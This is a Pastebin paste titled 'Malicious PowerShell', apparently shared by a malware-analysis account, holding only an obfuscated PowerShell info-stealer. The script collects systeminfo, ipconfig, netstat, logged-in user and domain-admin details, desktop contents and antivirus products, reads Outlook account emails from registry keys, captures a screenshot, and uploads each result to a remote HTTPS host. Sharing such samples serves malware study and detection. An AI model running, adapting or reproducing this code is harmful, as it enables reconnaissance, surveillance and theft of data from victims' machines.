Advertisement
dissectmalware

Malicious PowerShell

May 1st, 2019
1,253
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. function PMQty([int]$Wg94, [byte[]]$V6VCS)
  2. {
  3.     $sdo7g = "https://$F36ui/" + [QE7K9ZJvi46.QE7K9ZJvi46]::EA2gkql9ya($Wg94, 0, $true)
  4.     $hwv80v = [QE7K9ZJvi46.QE7K9ZJvi46]::BPizrD($V6VCS)
  5.     (New-Object System.Net.WebClient).UploadData($sdo7g, $hwv80v)
  6. }
  7.  
  8. function kvhLZVVHv40()
  9. {
  10.     if ((((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN))
  11.     {
  12.         $HmHCMAj1gp = "DOMAIN: NO`n`n"
  13.     } else { $HmHCMAj1gp = "DOMAIN: YES`n`n"}
  14.     $HmHCMAj1gp += "SYSTEMINFO:`n`n" + ((systeminfo) -join "`n")
  15.     $HmHCMAj1gp += "`n`nIPCONFIG:`n`n" + ((ipconfig /all) -join "`n")
  16.     $HmHCMAj1gp += "`n`nNETSTAT:`n`n" + ((netstat -f) -join "`n")
  17.     $HmHCMAj1gp += "`n`nNETVIEW:`n`n" + ((net view) -join "`n")
  18.     $HmHCMAj1gp += "`n`nTASKLIST:`n`n" + ((tasklist) -join "`n")
  19.     $HmHCMAj1gp += "`n`nWHOAMI:`n`n" + ((whoami) -join "`n")
  20.     $HmHCMAj1gp += "`n`nUSERNAME:`n`n" + ((net user $env:username /domain) -join "`n")
  21.     $HmHCMAj1gp += "`n`nDOMAIN ADMINS:`n`n" + ((net group "domain admins" /domain ) -join "`n")
  22.     $HmHCMAj1gp += "`n`nDESKTOP:`n`n" + (Get-ChildItem ([environment]::getfolderpath("desktop")) | Out-String)
  23.     $HmHCMAj1gp += "`n`nAV:`n`n" + (Get-WmiObject -Namespace "root\SecurityCenter2" -Query "SELECT * FROM AntiVirusProduct").displayName
  24.     $V6VCS = [System.Text.Encoding]::UTF8.GetBytes($HmHCMAj1gp)
  25.     PMQty 0 $V6VCS
  26. }
  27.  
  28. function Ux4jkLz([string] $path)
  29. {
  30.     $HmHCMAj1gp = ""
  31.     try {
  32.         $QQYrQ = (Get-ItemProperty $path | Where {$_ -match 'Account Name'})
  33.         foreach ($m in $QQYrQ) {
  34.             try {
  35.                 if ($m."Account Name".GetType().IsArray) {
  36.                     $ml = [System.Text.Encoding]::Unicode.GetString($m."Account Name")
  37.                 } else {$ml = $m."Account Name"}
  38.                 if ($ml -match "@") {
  39.                     $HmHCMAj1gp += "email: " + $ml + "`n"
  40.                 }
  41.             } catch {}
  42.         }
  43.         $QQYrQ = (Get-ItemProperty $path | Where {$_ -match 'Email'})
  44.         foreach ($m in $QQYrQ) {
  45.             try {
  46.                 if ($m.Email.GetType().IsArray) {
  47.                     $ml = [System.Text.Encoding]::Unicode.GetString($m.Email)
  48.                 } else {$ml = $m.Email}
  49.                 $HmHCMAj1gp += "email: " + $ml + "`n"
  50.             } catch {}
  51.         }        
  52.     } catch {}
  53.     $HmHCMAj1gp
  54. }
  55.  
  56. function vC6z()
  57. {
  58.     $HmHCMAj1gp = ""
  59.     $HmHCMAj1gp += Ux4jkLz "hkcu:\Software\Microsoft\Office\16.0\Outlook\Profiles\*\9375CFF0413111d3B88A00104B2A6676\*"
  60.     $HmHCMAj1gp += Ux4jkLz "hkcu:\Software\Microsoft\Office\15.0\Outlook\Profiles\*\9375CFF0413111d3B88A00104B2A6676\*"
  61.     $HmHCMAj1gp += Ux4jkLz "hkcu:\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\*"
  62.     if ($HmHCMAj1gp -ne "")
  63.     {
  64.         $V6VCS = [System.Text.Encoding]::UTF8.GetBytes($HmHCMAj1gp)
  65.         PMQty 1 $V6VCS
  66.     }
  67. }
  68.  
  69. function cY0yMOo7U3()
  70. {
  71.     Add-Type -Assembly System.Windows.Forms
  72.     $Ze8Fpb5KC = [Windows.Forms.SystemInformation]::VirtualScreen
  73.     $Rpmv5HB = New-Object Drawing.Bitmap $Ze8Fpb5KC.Width, $Ze8Fpb5KC.Height
  74.     $ntkkayAduow = [Drawing.Graphics]::FromImage($Rpmv5HB)
  75.     $ntkkayAduow.CopyFromScreen($Ze8Fpb5KC.Location, [Drawing.Point]::Empty, $Ze8Fpb5KC.Size)
  76.     $ntkkayAduow.Dispose()
  77.     $UkzcuaUqgj = New-Object System.IO.MemoryStream
  78.     $noFMcdA6cKj=40
  79.     $hwv80voderParams = New-Object System.Drawing.Imaging.EncoderParameters
  80.     $hwv80voderParams.Param[0] = New-Object Drawing.Imaging.EncoderParameter ([System.Drawing.Imaging.Encoder]::Quality, $noFMcdA6cKj)
  81.     $OmDwFp = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() | Where-Object { $_.FormatDescription -eq "JPEG" }
  82.     $Rpmv5HB.save($UkzcuaUqgj, $OmDwFp, $hwv80voderParams)
  83.     $Rpmv5HB.Dispose()
  84.     $V6VCS = [convert]::ToBase64String($UkzcuaUqgj.ToArray())
  85.     $V6VCS = [System.Text.Encoding]::ASCII.GetBytes($V6VCS)
  86.     PMQty 2 $V6VCS
  87. }
  88.  
  89. kvhLZVVHv40
  90. vC6z
  91. cY0yMOo7U3
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement